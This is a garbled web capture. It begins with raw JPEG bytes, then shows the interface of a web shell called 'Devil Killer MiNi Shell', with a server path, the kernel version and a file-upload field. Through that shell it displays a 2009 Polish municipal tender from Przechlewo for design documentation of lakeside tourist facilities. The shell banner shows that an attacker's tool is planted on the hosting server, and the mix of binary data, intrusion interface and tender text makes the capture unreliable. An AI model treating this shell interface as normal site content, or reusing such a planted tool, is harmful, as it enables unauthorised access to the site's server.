JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70399-N-2009.html

<p class="kh_header"><b>Przechlewo: Opracowanie dokumentacji budowlanej dla  zadania inwestycyjnego pt.:
 Kraina Czystych Jezior i Rzek- budowa ogólnodostępnej infrastruktury turystycznej w gminach : Przechlewo, miejskiej Człuchów, wiejskiej Człuchów, Debrzno, Koczała i Rzeczenica dofinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 Działanie 6.1. Infrastruktura wzmacniająca potencjał turystyczny</b><br>
<b>Numer ogłoszenia: 70399 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Przechlewo , ul. Człuchowska 26, 77-320 Przechlewo, woj. pomorskie, tel. 059 8334301, faks 059 8334631.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowlanej dla  zadania inwestycyjnego pt.:
 Kraina Czystych Jezior i Rzek- budowa ogólnodostępnej infrastruktury turystycznej w gminach : Przechlewo, miejskiej Człuchów, wiejskiej Człuchów, Debrzno, Koczała i Rzeczenica dofinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 Działanie 6.1. Infrastruktura wzmacniająca potencjał turystyczny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Opracowanie dokumentacji budowlanej dla  zadania inwestycyjnego pt.:   Kraina Czystych Jezior i Rzek- budowa ogólnodostępnej infrastruktury turystycznej w gminach : Przechlewo, miejskiej Człuchów, wiejskiej Człuchów, Debrzno, Koczała i Rzeczenica i obejmuje wykonanie następującego zakresu prac na terenie poszczególnych gmin:





1.Gmina Przechlewo:
1.1 Stanice nad rzeką Brdą w Żołnie, Nowej Brdzie, Folbryku, Garbatym Moście, Dolince, Płaszczycy obejmujące miedzy innymi: zagospodarowanie w ławki, zagospodarowanie w stoły, wybudowanie wiatek, postawienie ubikacji typu TOI-TOI, postawienie pojemników na śmieci, wymurowanie miejsc na ogniska, budowę kładek ułatwiającej zwodzenie kajaków 
1.2 Ośrodek Sportu i Rekreacji:
Ogrodzenie ośrodka (600m - 1,5m siatka powlekana), remont schodów ( 65 m - 2,5m szerokość), dróg wewnętrznych (30m x 3 m) i chodników (25m - 1,5 m), wykonanie oświetlenia, budowę placu zabaw, budowę boiska wielofunkcyjnego (15x20m) i boiska do piłki plażowej (10x20m), rozbudowę plaży i pomostów, budowę mostku przez rzekę Brda, wybudowanie punktu informacji turystycznej i świetlicy(6x7m), przebudowę przystani i hangaru na sprzęt wodny (20x6m), wykonanie obiektów małej architektury, budowę parkingu(450m2).
1.3 Park nad jeziorem Przechlewskim: 
Zagospodarowanie plaży, wyposażenie parku w obiekty małej architektury, wybudowanie placu zabaw, wybudowanie boiska do piłki plażowej (10x20m), nasadzenia roślinności, oświetlenie Parku, częściowe ogrodzenie(1,5m x 150m - siatka powlekana), wybudowanie alejek (300mx1,2m), postawienie ubikacji typu TOI-TOI.
1.4 Ścieżki pieszo-rowerowe nad jeziorem Szczytno:
-.Brama OSiR - skrzyżowanie Przechlewo-Szczytno (900mx2,2m - polbruk),
- Skrzyżowanie Przechlewo-Szczytno - do miejscowości Szczytno (1500m x 2m- umocnienie pobocza) , 
- Miejscowość Szczytno do skrzyżowania Zawada-Dobrzyń (500mx 1,5m - polbruk), 
-  Skrzyżowanie Zawada-Dobrzyń do Skrzyżowania Klęśnik (tylko oznakowanie), 
- Skrzyżowanie Klęśnik do drogi nr 25 (2370m x 2,5m - wyrównanie istniejącej nawierzchni). 
Miejsca postojowe na szlakach ścieżek pieszo-rowerowych Klęśnik: zagospodarowanie w stoły, postawienie pojemników na śmieci, postawienie ubikacji typu TOI-TOI, wybudowanie miejsca widokowego, wybudowanie wiatki, wymurowanie miejsca na ognisko, zagospodarowanie w ławki. 
2.Gmina Miejska Człuchów 
2.1 Zagospodarowanie  plaży OSiR nad Jeziorem Rychnowskim:
Roboty rozbiórkowe budynków garażowo - magazynowych, wykonanie drogi dojazdowej ( ciągu pieszo - jezdnego - 7 m x 15 m, ciąg pieszy 7m x 193m ), ciągi piesze przy budynku obsługi i budynku informacji 67m2, tereny utwardzone wokół urządzeń zabawowych i przy stolikach: 395m2, pozostałe tereny utwardzone (chodniki) - 394m2 ( utwardzone polbrukiem i kostką brukową kolorową), budowa mola z pomostami widokowymi(molo o długości 60 m szerokości 7m o konstrukcji żelbetowej uzgodnionej z Inwestorem zakończone dwoma pomostami pływającymi o pokładach drewnianych: pierwszy o długości 34,5m i szerokości 5,5m, drugi o długości 15,5m i szerokości 5,5m; wraz z punktem ratunkowo - obserwacyjnym oraz wieżą do skoków w miejscu zgodnym z przepisami, utworzenie parku golfa miniaturowego i parku liniowego, budynków obsługi ( 7,5m x 12m i 3,5m x 3,5m), budowę punktu sanitarnego z przebieralnią ( 15m x 7m), utworzenie placu zabaw, utworzenie mini parku wodnego z prysznicami zewnętrznymi, wybudowanie miejsca rekreacji i wypoczynku z grillem i oczkiem wodnym, wykonanie oświetlenia terenu, elementy małej architektury oraz ogrodzenie terenu.




3.Gmina Człuchów: 
3.1 Utworzenie terenu rekreacyjnego nad Jeziorem Rychnowskim:
urządzenie plaży, budowa pomostu pływającego o dł. 27m i szer.18,5m,  zakup toalet przenośnych, urządzenie placu zabaw dla dzieci, budowę drogi dojazdowej (6m x 450m - polbruk), budowa placów i parkingów (150m2), wykonanie przyłącza kanalizacji sanitarnej (289mb), budowę boiska do piłki plażowej, budowę zadaszonej wiaty ze stołem i ławkami, ognisko, grill, oświetlenie uliczne-10 punktów oświetleniowych.
4.Miasto i Gmina Debrzno 
4.1 Zagospodarowanie  terenu rekreacyjnego nad Jeziorem Żuczek:
Budowa drogi dojazdowej (800mb x 4m-nawierzchnia tłuczeń), budowę parkingu dla 78 samochodów osobowych, utworzenie pola namiotowego wyposażonego w instalacje: elektryczną, wodociągową i kanalizację sanitarną, budowę budynku socjalnego (99.1m2), budowę wiaty drewnianej, jako miejsca składowania kajaków i innego sprzętu pływającego, utworzenie placu zabaw dla dzieci, budowę boiska do gry w siatkówkę i boiska do gry w koszykówkę, naprawę pomostu kąpieliska.
5.Gmina Koczała:
5.1 Zagospodarowanie terenu rekreacyjnego nad  jeziorem Dymno:
 utworzenie pola namiotowego na 20 namiotów indywidualnych, utworzenie pola caravaningowego dla 10 przyczep kempingowych, budowę budynku socjalnego, w którym znajdą się sanitariaty wyposażone w toalety, prysznice i umywalki oraz recepcja i kuchnia dla przebywających na polu namiotowym (ok. 300m2), budowa magazynu - wypożyczalni (ok.70m2), w którym przechowywany będzie sprzęt wodny i sprzęt ratowników WOPR,
zagospodarowanie kąpieliska poprzez ustawienie na plaży ławeczek, przebieralni i zadaszonych miejsc do wypoczynku, boisko do piłki plażowej, ogródek letni z miejscami do siedzenia, stołami i letnią roślinnością, plac gier i zabaw dla dzieci, trzy miejsca na ognisko i do grillowania, ze stolikami, ławeczkami i zadaszeniem, amfiteatr z widownią na około 80 osób, parking z 20 miejscami postojowymi, doprowadzenie sieci wodociągowej, kanalizacyjnej i energetycznej (ok.600mb), budowa odcinka drogi dojazdowej (525mx 6-7m) z ciągiem pieszym - o szerokości ok. 2m - gruntowym
5.2 Stanice oraz punkty widokowe
Stanica kajakowa i wieża widokowa nad Jez. Głębokim w Niesiłowie oraz stanice Wilkowie i Starej Brdzie Pilskiej: pomosty i kładki umożliwiające swobodne zwodzenie kajaka lub podpłynięcie i wyjście na brzeg, wiaty z miejscem na ognisko, kompletem stolików i ławeczek, ławki, sanitariaty, kosze na śmieci, wieża widokowa.
6.Gmina Rzeczenica 
6.1 Ośrodek Wypoczynkowy  Rzewnica nad jeziorem Szczytno:
a)  budowa kąpieliska wraz z zagospodarowaniem plaży
b) Budowa budynku sanitarnego (pow. 76,48 m2), budowa budynku recepcyjnego (51,66 m2), budowa hangaru na sprzęt wodny (132,3 m2), budowa punktów widokowych, zagospodarowanie terenu pola namiotowego, wykonanie ogrodzenia ,zieleni,parkingi, wykonanie przyłączy: elektrycznego, wodociągowego i kanalizacyjnego,
6.2 Drogi dojazdowe:
a) budowa drogi dojazdowej od drogi powiatowej Rzeczenica-Przechlewo do pola     
      namiotowego (2000m x 3,5m - droga gruntowa), 
b) budowa drogi dojazdowej od drogi nr 25 do Rzewnicy (1300 m x 3,5m - ażurowa powierzchnia betonowa - płyty YOMB.).
6.3 Ścieżki rowerowe
 utworzenie ścieżki rowerowej Rzeczenica-Rzewnica (3500m x 3m - gruntowa),




UWAGA!  
Elementy zadania  określone w w  pkt 6.1  b)  i  6.2  b)   posiadają pozwolenie na budowę .Na podstawie istniejącej dokumentacji  należy opracować dla wszystkich branż jedynie : przedmiar robót, kosztorysy inwestorskie wraz ze zbiorczym zestawieniem kosztów , kosztorysy  ofertowe , specyfikację techniczną wykonania i odbioru robót

Przedmiot zamówienia polega na;
1.	Opracowaniu dokumentacji  budowlanej  zgodnie z zasadami współczesnej wiedzy technicznej i normami, obowiązującymi przepisami, w tym, między innymi. przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (tekst jednolity Dz.U. z 2006 r. nr 156, poz.118 z późn. zm.). oraz  zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 3 lipca 2003r.w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz..U. z 2003 r. Nr 120, poz.1133 ze zm.) oraz  Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 02marca 1999r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, w tym opracowanie ;
a/  opracowanie map do celów projektowych
b/  przygotowanie wniosku o wydanie decyzji o warunkach zabudowy, lokalizacji celu publicznego , uzyskanie decyzji zezwalającej od zarządcy drogi  na realizację inwestycji w pasie drogowym.
  c/ opracowanie operatów wodno-prawnych i uzyskanie pozwoleń wodno-prawnych ,
d/ projektów budowlanych wszystkich branż - wykonanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz..U. z 2003 r. Nr 120, poz.1133 ze zm.),
e/ projektów wykonawczych stanowiących uzupełnienie i uszczegółowienie projektów budowlanych w zakresie i stopnie niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowanie oferty przez wykonawcę realizacji robót budowlanych
f/ przedmiaru robót  - dla każdej z branż
g/ kosztorysów  inwestorskich zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego , obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno -użytkowym (Dz.U. Nr 130, poz.1389) wraz ze zbiorczym zestawieniem kosztów wszystkich branż.
h/ kosztorysów ofertowych dla każdej z branż
i/ specyfikację techniczną wykonania i odbioru robót zgodnie z Rozporządzeniem, Ministra Infrastruktury  z dnia 2 września 2004 r. w sprawie szczegółowego zakresu formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robot budowlanych .oraz programu funkcjonalno-użytkowego (Dz..U. z 2004 r. Nr 202, poz. 2072 ze zm.)
j/ projekt organizacji ruchu przy projektach drogowych
k/ inne opracowania konieczne do prawidłowego wykonania dokumentacji technicznej (np. badania geologiczne)



2.	Dokumentację budowlaną należy opracować odrębnie dla: Gminy Przechlewo Gminy Miejskiej Człuchów , Gminy Człuchów, Miasta i Gminy Debrzno ,Gminy Koczała, Gminy  Rzeczenica. 
3.	Wymagana ilość opracowań::
a/ projekty budowlane wszystkich branż -  po 6 kpl.
b/ projekty wykonawcze - po  3 kpl..
  c/ specyfikacja techniczna - 2 kpl..
d/ przedmiary robót dla projektowanych branż - po 2 kpl.
e/ kosztorys inwestorski i zbiorcze zestawienie kosztów - po 2 kpl.
f/ kosztorys ofertowy - po2 kpl.
g) projekt organizacji ruchu - po 2 kpl.
4. Wykonawca zobowiązany jest dostarczyć dokumentację projektową z zawartością tekstową i graficzną a także w wersji elektronicznej, płyt CD w formacie PDF - umożliwiającej Zamawiającemu zamieszczenie dokumentacji na stronie internetowej jako załącznik do SIWZ na wykonanie robót.
Dane do opracowania dokumentacji projektowej , badania , pomiary , uzgodnienia oraz materiały niezbędne do sporządzenia dokumentacji Wykonawca uzyska we własnym zakresie i na własny koszt.
Projekty winny posiadać wszystkie niezbędne uzgodnienia zapewniające uzyskanie pozwolenia na budowę.
Zaleca się przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania wszystkich informacji koniecznych do przygotowania oferty zawarcia umowy. Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  żąda  wniesienia  wadium.  Kwota  wadium  wymagana  do  wzięcia  udziału  w postępowaniu wynosi 5.000,00 PLN (pięć tysięcy złotych)

Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych, gwarancjach ubezpieczeniowych,
poręczeniach udzielonych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 b) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm.).


Wadium wniesione w formach innych niż pieniądzu musi zawierać zobowiązanie gwaranta lub poręczyciela  z  tytułu  wystąpienia  zdarzeń,  o  których  mowa  w  art.  46  ust.  5  ustawy  Prawo Zamówień Publicznych. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, wadium to musi obejmować zobowiązanie gwaranta lub poręczyciela z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.

5.1 Informacje dodatkowe o wadium:
1)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego:
Bank Spółdzielczy w Człuchowie O/Przechlewo 81 9326 0006 0060 0109 2000 0080
z dopiskiem 
2)	Wadium  wnosi  się  przed  upływem  terminu  składania  ofert.  W  przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku bankowego Zamawiającego.
3)	W przypadku wniesienia wadium w pozostałych formach, innych niż pieniądz, do oferty należy dołączyć, w osobnej koszulce oryginał dokumentu wadium - nie łączyć go na trwale z ofertą. Dodatkowo należy do oferty dołączyć, potwierdzoną za zgodność z oryginałem, kopię dokumentu wadium.
 Oferta  nie  zabezpieczona  akceptowalną   formą   wadium  zostanie  odrzucona  bez rozpatrywania.
4)	Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy Prawo zamówień publicznych. W przypadku wadium wniesionego w pieniądzu zwrot nastąpi przelewem na rachunek bankowy wskazany w piśmie przez Wykonawcę, a wniesionego w innej formie - w kasie Zamawiającego.
5)	Zwrot wadium nastąpi, jeśli zaistnieje jedna z poniższych okoliczności:
a)	upłynął termin związania ofertą,
b)	zawarto  umowę  w  sprawie  zamówienia  publicznego  i  wniesiono  zabezpieczenie należytego wykonania tej umowy,
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
d)	na wniosek Wykonawcy, jeśli Wykonawca wycofał ofertę przed upływem terminu składania ofert,
e)	na wniosek Wykonawcy, jeśli został on wykluczony z postępowania, f)	na wniosek Wykonawcy, jeśli jego oferta została odrzucona.
6)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeśli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów, o których mowa w art.
25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
7)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił  podpisania  umowy  w  sprawie  zamówienia  publicznego  na  warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8)	Złożenie  przez  Wykonawcę,  którego  oferta  została  odrzucona  lub  wykluczonego  z postępowania, wniosku o  zwrot  wadium jest  równoznaczne ze  zrzeczeniem się  przez Wykonawcę prawa do wniesienia protestu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1) Nie są wykluczeni z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Prawa Zamówień Publicznych,
2) Spełniają warunki określone w art. 22 ust.1 pkt 1-4 Prawa Zamówień Publicznych, tzn.

a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
  c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ,
      d)   nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

3)  Spełniają następujące warunki szczegółowe:
a)  W celu potwierdzenia że Wykonawca posiada niezbędną wiedzę i doświadczenie , a w szczególności, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania  o udzielenie zamówienia , a jeżeli okres prowadzenia jest krótszy - w tym okresie wykonał co najmniej                    1 dokumentację projektową odpowiadającą swoim rodzajem  o wartości nie mniejszej niż 100.000 zł brutto 
b)  W celu potwierdzenia,  że wykonawca dysponuje osobami zdolnymi do ( w stopniu wystarczającym ) do wykonania zamówienia., a w szczególności.:
- co najmniej 6 osób posiadających uprawnienia budowlane do projektowania o specjalności architektonicznej, przynależące do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe  w projektowaniu 
- co najmniej  2 osoby posiadające uprawnienia budowlane do projektowania o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń, wodociągowych i kanalizacyjnych, przynależące do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe w projektowaniu
- co najmniej 1 osoba posiadająca uprawnienia budowlane do projektowania  w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych przynależąca do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe w projektowaniu.
- co najmniej 2 osoby posiadające uprawnienia budowlane do projektowania  w zakresie konstrukcyjno- budowlanej przynależące do Okręgowej Izby Inżynierów Budownictwa, posiadające co najmniej 5-letnie doświadczenie zawodowe w projektowaniu.

- co najmniej 2 osoby posiadające uprawnienia budowlane do projektowania w specjalności drogowej  w zakresie dróg , przynależące do Okręgowej Izby Inżynierów Budownictwa, posiadające co najmniej 5-letnie doświadczenie zawodowe w projektowaniu

- co najmniej 1 osoby posiadająca uprawnienia budowlane do projektowania w specjalności mostowej , przynależąca do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe w projektowaniu
c)  Wskażą do wykonania niniejszego zamówienia wyżej określone osoby wraz z informacjami na temat ich kwalifikacji, które są niezbędne do wykonania przedmiotowego zamówienia, a także określeniem zakresu wykonywanych przez nich czynności:
d) W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ;
-  posiadają za ostatnie trzy lata obrotowe - obroty na kwotę co najmniej 300 000,00 zł., a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres     
 - jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności na kwotę 500.000 złotych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> FORMULARZ	OFERTY,	stanowiący	integralną	część	niniejszego	SIWZ,	wypełniony i podpisany przez osobę uprawnioną do reprezentowania Wykonawcy i składania oświadczeń woli (załącznik nr 1)
   a)   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu  prawnego  w  zakresie  objętym  przedmiotem  zamówienia  oraz  zawierające nazwisko osoby (osób) uprawnionych do reprezentowania firmy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
       b)   Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub  Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
       c)     Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.   
    24 ust.1 pkt 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu  
    składania ofert;
     d)    Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
        e)    Aktualne zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że            
   Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał 
   przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności,        
   lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie 
    wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         f)    Oświadczenie Wykonawcy o spełnieniu warunków w związku z art.22 i 24 Ustawy
  Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223, poz.
  1655 i Dz. U. z 2008 r. Nr 171, poz. 1058) -  Załącznik nr 2 do SIWZ
